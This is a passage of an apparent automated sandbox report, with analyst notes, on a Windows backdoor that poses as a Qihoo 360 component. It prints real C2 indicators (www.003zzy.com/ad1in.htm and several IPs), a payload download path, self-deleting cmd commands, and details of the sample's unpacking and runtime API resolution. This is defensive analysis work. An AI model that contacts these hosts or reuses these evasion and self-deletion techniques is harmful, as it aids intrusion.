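        f.write(decrypt_image(dump))
```

Because the key is applied per dword with no feedback, decryption can be checked locally: after xor_ranges the bytes at RVA 0x1000 should start with recognisable x86 prologues, and a wrong range simply leaves a stretch of high-entropy bytes behind rather than corrupting the rest.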
      Programming Language:
      • [LNK] VC++ 6.0 SP5 build 8804
      • [C++] VS98 (6.0) build 8168
      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe145 | 0x8c | .Katja
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1504 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0x10 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x48a5 | 0x4a00 | 19a8c9be028846d0695fc5d7ed1786e1 | False | 0.6620565878378378 | COM executable for DOS | 7.183221181125893 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x6000 | 0xc86 | 0xe00 | 3faacc8d9bdb0bba9502ef9abf92c7ec | False | 0.45200892857142855 | data | 5.204326514440395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x7000 | 0x2b3c | 0x1a00 | fff70a9be21a1df56244b684a22bfced | False | 0.6604567307692307 | data | 6.6392803389643005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.mackt | 0xa000 | 0x1000 | 0x1000 | b6665b84385f56250cb043829252ce2c | False | 0.310302734375 | data | 3.429642363371091 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp0 | 0xb000 | 0x381 | 0x400 | 57e1e1ce532f5f5d62e1fe232271d622 | False | 0.740234375 | data | 5.873286808120885 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE
.reloc | 0xc000 | 0x10 | 0x200 | 5265fb518934649cf18f37241a28e09e | False | 0.056640625 | GLS_BINARY_LSB_FIRST | 0.19977565608732903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
300 | 0xd000 | 0x200 | 0x200 | cae9fd76ccb99fa73cee42562f62caa6 | False | 0.44140625 | data | 3.6700111801610693 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.Katja | 0xe000 | 0x1000 | 0x195 | 8d18773c7a60edfa7f3a902f8d2c212c | False | 0.528395061728395 | data | 3.2369415694512034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf000 | 0x2000 | 0x1600 | cf92fcb478234b44464107f3c9b16e03 | False | 0.36274857954545453 | data | 5.49774110339037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Note: the [LordPE] marker in the header preview and the .mackt section (the name ImportREC gives the import table it rebuilds) show the file was dumped from memory and rebuilt rather than linked, which also explains the unaligned 0x195 raw size of .Katja and the tiny static import table. The entry point 0x40d07e lies in the 0x200-byte section 300, outside every standard section, and .text, .rdata and .data are all RWX because the stub in 300 decrypts them in place (hence .text entropy 7.18 against 3.2 to 5.5 for the other sections). The raw sections total about 0xb000 bytes; the remaining 25 MB of the file is overlay, which is why the whole-file entropy is only 4.80.
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf0f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Chinese | China | 0.3545966228893058
RT_GROUP_ICON | 0x10198 | 0x14 | data | Chinese | China | 1.1
RT_VERSION | 0x101ac | 0x358 | data | Chinese | China | 0.48598130841121495
DLL | Import
kernel32.dll | LoadLibraryA, GetProcAddress, GetTickCount, DeleteFileA
GDI32.dll | DeleteObject, GetDIBits
ADVAPI32.dll | CloseServiceHandle
Note: only seven static imports. The socket, service, registry, token and process-injection APIs that appear in the execution graph are resolved at runtime through LoadLibraryA/GetProcAddress, which is what the "dynamically determine API calls" signature reports. The import hash 75a7edd5e27e3873db683bbba6fe50dc is therefore computed over this rebuilt stub table and will group other dumps rebuilt the same way, not other builds of the payload.
Description | Data
CompanyName | (C)360.cn Inc.All Rights Reserved.
FileDescription | 360.cn
FileVersion | 360
InternalName | 3, 2, 2, 1002
LegalCopyright | (C)360.cn Inc.All Rights Reserved.
OriginalFilename | ZhuDongFangYu.exe
ProductName | 360
ProductVersion | 3, 2, 2, 1002
SpecialBuild | 668531542187500
Translation | 0x0409 0x04b0
Note: the version resource impersonates Qihoo 360's ZhuDongFangYu.exe (the 360 Safeguard active-defence component) with a 360.cn copyright, while the file is unsigned and carries a different name; this is the basis of the Masquerading mapping and of the "Sample file is different than original file name gathered from version info" signature. The en-US translation (0x0409) also clashes with the Chinese/China language of the resources.
Language of compilation system | Country where language is spoken
Chinese | China


      • Total Packets: 4
      • 80 (HTTP)
      • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 6, 2025 09:31:28.462925911 CEST | 49717 | 80 | 192.168.2.5 | 5.79.71.225
Apr 6, 2025 09:31:29.465687990 CEST | 49717 | 80 | 192.168.2.5 | 5.79.71.225
Apr 6, 2025 09:31:31.559541941 CEST | 49717 | 80 | 192.168.2.5 | 5.79.71.225
Note: three packets from the same source port at roughly 1 s and 2 s spacing, and nothing back from 5.79.71.225, is the shape of SYN retransmission: the server did not complete a handshake during the run, so no HTTP request for /ad1in.htm was ever sent and the C2 protocol remains unobserved in this capture.
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 6, 2025 09:31:27.789021969 CEST | 65424 | 53 | 192.168.2.5 | 1.1.1.1
Apr 6, 2025 09:31:28.422461987 CEST | 53 | 65424 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 6, 2025 09:31:27.789021969 CEST | 192.168.2.5 | 1.1.1.1 | 0x426e | Standard query (0) | www.003zzy.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 5.79.71.225 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 85.17.31.82 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 85.17.31.122 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 178.162.203.202 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 178.162.203.211 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 178.162.203.226 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 178.162.217.107 | A (IP address) | IN (0x0001) | false
Apr 6, 2025 09:31:28.422461987 CEST | 1.1.1.1 | 192.168.2.5 | 0x426e | No error (0) | www.003zzy.com | | 5.79.71.205 | A (IP address) | IN (0x0001) | false
Note: the name resolves to eight addresses, of which the sample only tried the first; block on the domain rather than on 5.79.71.225 alone (85.17.31.122 also appears in the LEASEWEB-NL-AMS-01 context list above).
      Target ID:0
      Start time:03:31:26
      Start date:06/04/2025
      Path:C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.Darkshell.246.151.16384.exe"
      Imagebase:0x400000
      File size:25'208'853 bytes
      MD5 hash:4194BA809C07479D0B6C3681D218661B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\WinH83.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\system32\WinH83.exe"
      Imagebase:0x7ff7e2000000
      File size:50'382'421 bytes
      MD5 hash:C7B758D198A32EF2BA4112EF346C74BA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Antivirus matches:
      • Detection: 100%, Avira
      Reputation:low
      Has exited:true

      Target ID:2
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /C del C:\Users\user\Desktop\SECURI~1.EXE > nul
      Imagebase:0x220000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:03:31:32
      Start date:06/04/2025
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\system32\cmd.exe /C del C:\Windows\SysWOW64\WinH83.exe > nul
      Imagebase:0x220000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

Execution Coverage: 11.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 26.6%
Total number of Nodes: 571
Total number of Limit Nodes: 8
      execution_graph 1446 401860 GetModuleHandleA GetProcAddress 1447 40189a 1446->1447 1448 4018a5 GlobalAlloc 1447->1448 1449 401a0b printf 1447->1449 1450 4018c1 1448->1450 1450->1449 1451 4018c9 LoadLibraryExA 1450->1451 1452 4018f2 GetLastError printf 1451->1452 1453 40190f GlobalFree GetProcAddress 1451->1453 1454 401940 1453->1454 1455 40192a printf 1453->1455 1464 401720 1454->1464 1457 401949 1458 401952 printf 1457->1458 1459 401968 printf 1457->1459 1460 40198e 1459->1460 1461 4019ed printf FreeLibrary 1460->1461 1471 401680 1460->1471 1468 401748 1464->1468 1465 401839 printf 1466 401847 1465->1466 1466->1457 1467 401833 1467->1465 1467->1466 1468->1465 1468->1467 1469 4017dc printf 1468->1469 1470 40181e 1468->1470 1469->1468 1470->1457 1472 401688 DeviceIoControl 1471->1472 1473 4016b7 printf 1471->1473 1472->1473 1474 4016ad GetLastError 1472->1474 1473->1460 1473->1461 1474->1473 1475 401b60 CreateFileA 1476 401b85 GetFileSize 1475->1476 1477 401bcb CloseHandle 1475->1477 1476->1477 1478 401b98 ??2@YAPAXI ReadFile CloseHandle 1476->1478 1479 401f60 RegisterServiceCtrlHandlerA SetServiceStatus 1480 401ff3 1479->1480 1502 401000 LoadLibraryA 1480->1502 1483 40202e 1507 405440 1483->1507 1484 402009 1484->1483 1488 402011 1484->1488 1485 40201d 1486 4054b0 3 API calls 1485->1486 1489 40201b 1486->1489 1491 4053c0 3 API calls 1488->1491 1490 40203d GetModuleFileNameA 1489->1490 1510 404c10 GetModuleHandleA GetProcAddress 1490->1510 1491->1489 1493 40205d 1511 405270 CreateFileA 1493->1511 1495 402083 1496 402093 1495->1496 1497 40208c ExitProcess 1495->1497 1519 401030 GetSystemDirectoryA 1496->1519 1499 402098 GetCurrentProcess SetPriorityClass 1522 402310 CreateMutexA GetLastError 1499->1522 1501 4020af 1503 401012 GetProcAddress 1502->1503 1504 40102b 1502->1504 1505 401022 1503->1505 1506 401024 FreeLibrary 1503->1506 1504->1483 1504->1484 1504->1485 1505->1506 1506->1504 1508 405452 1507->1508 1509 40545c GetSystemDirectoryA lstrcat lstrcpy 

      Executed Functions

      Control-flow Graph

      APIs
      • SetErrorMode.KERNEL32(00000001), ref: 00401D08
      • GetModuleHandleA.KERNEL32(kmon.dll,?,?,?,?,?,000001BC,000007C2), ref: 00401D77
      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,000001BC,000007C2), ref: 00401D7E
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00401E2C
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E41
      • lstrcmpi.KERNEL32(?,?), ref: 00401E5D
      • GetCurrentProcess.KERNEL32(00004000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E68
      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E6F
      • lstrcmpi.KERNEL32(?,?), ref: 00401E96
      • CopyFileA.KERNEL32(?,?,00000000), ref: 00401EB9
      • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401ECA
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$Modulelstrcmpi$AttributesClassCopyCurrentErrorFreeHandleLibraryModeNamePriorityProcesslstrcat
      • String ID: 8$A$B$C$D$E$F$G$H$I$J$K$Mu$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$WinH83$WinH83.exe$Windows Help System83$Windows83$kmon.dll
      • API String ID: 139532127-2983036780
      • Opcode ID: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction ID: 5410645d6abaed84b275c9712b1141a2809baf3a13989eb83d3553c9209378c8
      • Opcode Fuzzy Hash: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction Fuzzy Hash: A281F8B0148342ABD310EB60DD45BDB7BD8EF84718F40492EF689661D1EBBCD51887AB

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll,00707474), ref: 004065C9
      • GetProcAddress.KERNEL32 ref: 004065DF
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004065F1
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenA), ref: 00406607
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenUrlA), ref: 0040661F
      • GetProcAddress.KERNEL32(6F3E0000,InternetReadFile), ref: 00406637
      • GetProcAddress.KERNEL32(6F3E0000,InternetCloseHandle), ref: 0040664F
      • Sleep.KERNEL32(001B7740), ref: 00406660
      • InternetOpenA.WININET(MyAgrent,00000000,00000000,00000000,00000000), ref: 00406674
      • InternetOpenUrlA.WININET(http://www.003zzy.com/ad1in.htm,00000000,00000000,80000000,00000000), ref: 0040669D
      • InternetReadFile.WININET(00406949,000000FF,00406544), ref: 004066C5
      • InternetCloseHandle.WININET ref: 004066D1
      • InternetCloseHandle.WININET ref: 004066DD
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressInternetProc$CloseHandleLibraryLoadOpen$FileReadSleep
      • String ID: C:\WINDOWS\admier.exe$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MyAgrent$URLDownloadToFileA$http$http://www.003zzy.com/ad1in.htm$open$urlmon.dll$wininet.dll
      • API String ID: 4214780637-2500366654
      • Opcode ID: 075222d36303aed69531d2aa439cf0f5889836ec3cba74296871606b2dadfa53
      • Instruction ID: 0e75a09c8e8ff56f22cbdb51a2305809e01660930c3cab75a0091f40f6fe4516
      • Opcode Fuzzy Hash: 075222d36303aed69531d2aa439cf0f5889836ec3cba74296871606b2dadfa53
      • Instruction Fuzzy Hash: 09613AB0689380BFD3119BA4BE1AB453FA5B707714F26007AE503BA5EAD3B91434CB0D

      Control-flow Graph

      APIs
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      • DeleteFileA.KERNEL32(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction ID: febd643f651e9d90d4cf83c175e36f54a99a928136d9d2cdfec75408947fadb0
      • Opcode Fuzzy Hash: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction Fuzzy Hash: DE01B1B1C001149FD3259F94DD44B267769EB03328F25507AE80EBB682D7B9AC0ADA1D

      Control-flow Graph

      APIs
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      • DeleteFileA.KERNEL32(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction ID: 92145c9a365872201136f2ad8642b24408a080cd8a60a41ca3e7793543610a8a
      • Opcode Fuzzy Hash: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction Fuzzy Hash: A0E0EC309852408FC326DBB48959916BB71EB03315F1564B6D009F76A2C378DC4EC61D

      Control-flow Graph

      APIs
      • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,76835280), ref: 004011FA
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76835280), ref: 00401214
      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00401231
      • Sleep.KERNEL32(00000001,00000000,?,76835280), ref: 00401242
      • lstrcat.KERNEL32(?,?), ref: 00401284
      • lstrcat.KERNEL32(?,?), ref: 004012C7
      • GetCurrentProcess.KERNEL32 ref: 00401302
      • SetPriorityClass.KERNEL32(00000000), ref: 0040130F
      • GetCurrentThread.KERNEL32 ref: 00401313
      • SetThreadPriority.KERNEL32(00000000), ref: 00401320
      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,00000100), ref: 00401342
      • SetPriorityClass.KERNEL32(?,00000040), ref: 00401354
      • SetThreadPriority.KERNEL32(00000100,000000F1), ref: 0040135D
      • ResumeThread.KERNEL32(00000100), ref: 00401364
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: PriorityThread$ClassCurrentNameProcesslstrcat$CreateEnvironmentFileModulePathResumeShortSleepVariable
      • String ID: /C del $ > nul$COMSPEC$D
      • API String ID: 1484168510-811065519
      • Opcode ID: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction ID: 83a5a0624438e48de483ece212b65a11f95c74cb0b9da3eb9e72a1bcf4c41a49
      • Opcode Fuzzy Hash: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction Fuzzy Hash: B541A071644300AFE324CB75DC49FABB7E9BBC4710F008A2DB69AA72D0DBB599048B55

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401100
      • Sleep.KERNEL32(00000001), ref: 0040111A
      • GetProcAddress.KERNEL32(00000000,CreateProcessInternalA), ref: 00401122
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProcSleep
      • String ID: CreateProcessInternalA$kernel32.dll
      • API String ID: 188063004-3660314680
      • Opcode ID: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction ID: 17414ca3e7859be5678fcf000ff8f36a898fc3596c14bf2c8eff9706db6db05c
      • Opcode Fuzzy Hash: c94f652345d368492b510be50749c763d3809195a6ab1b817fa2ed5e1467b805
      • Instruction Fuzzy Hash: 9911E731680318BBE720EF94DD0AFDE7B78DB85711F1041A6FE09BA2C0D6B469548BE5

      Control-flow Graph

      APIs
      • lstrcat.KERNEL32(?,0040655D), ref: 00406851
      • lstrcat.KERNEL32(00000000,WinH83.exe), ref: 0040685D
      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00406885
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00406899
      • WriteFile.KERNEL32(00000000,00401000,00000040,00406559,00000000), ref: 004068C5
      • CloseHandle.KERNEL32(00000000), ref: 004068D4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$lstrcat$CloseCreateHandlePointerWrite
      • String ID: WinH83.exe
      • API String ID: 3608828543-543210326
      • Opcode ID: 9a5a1cb60774c3cd54556950267b8d06c8b4aba6bfc6c83be5b6be6d6c1ec890
      • Instruction ID: 69b20180e3b7220f36dca54e68a66d8a4ad28fd96bca0297548ba8a7c77a2430
      • Opcode Fuzzy Hash: 9a5a1cb60774c3cd54556950267b8d06c8b4aba6bfc6c83be5b6be6d6c1ec890
      • Instruction Fuzzy Hash: 2A1196B1690344BBDB10DF50CCC9F693369FB09700F158039BB0ABE2D1E7B86914862D

      Control-flow Graph

      APIs
      • lstrcat.KERNEL32(?,0040655D), ref: 00406851
      • lstrcat.KERNEL32(00000000,WinH83.exe), ref: 0040685D
      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00406885
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00406899
      • WriteFile.KERNEL32(00000000,00401000,00000040,00406559,00000000), ref: 004068C5
      • CloseHandle.KERNEL32(00000000), ref: 004068D4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$lstrcat$CloseCreateHandlePointerWrite
      • String ID: WinH83.exe
      • API String ID: 3608828543-543210326
      • Opcode ID: 64929941959a351eb6e5df3572f0dec3118bb976535e345188da3b5fc1adc2ac
